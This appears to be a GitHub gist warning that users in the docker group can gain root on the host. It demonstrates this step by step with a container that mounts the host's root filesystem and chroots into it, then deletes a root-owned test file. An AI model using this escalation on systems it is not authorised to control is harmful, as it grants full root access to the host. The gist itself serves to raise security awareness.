Skip to content

Instantly share code, notes, and snippets.

Last active May 8, 2023 03:57
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
A user belongs to docker group can gain root access on your host
Be careful if you are adding user to docker group.
1. As a root, create a file (owner root and group root)
$ touch /etc/foo
$ ls -l /etc/foo
-rw-r--r-- 1 root root 0 Dec 5 17:40 /etc/foo
2. Login as a non-root user belongs to docker group. In my example its user u1.
$ id
uid=1002(u1) gid=1002(u1) groups=1002(u1),999(docker)
3. Since the user belongs to docker group, it has access of all of the docker commands like
docker run, docker ps, etc.
That user can spin up a new container which can mount "/" and then chroot to it as shown below.
$ docker run -ti -v /:/host fedora chroot /host
4. Now the user u1 (non-root) has access of root, so u1 can delete the file from within container we created earlier as root.
$ rm /etc/foo (This is from inside the fedora container)
5. From the root, verify the file is actually gone (deleted by user u1)
$ ls -l /etc/foo
ls: cannot access '/etc/foo': No such file or directory
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment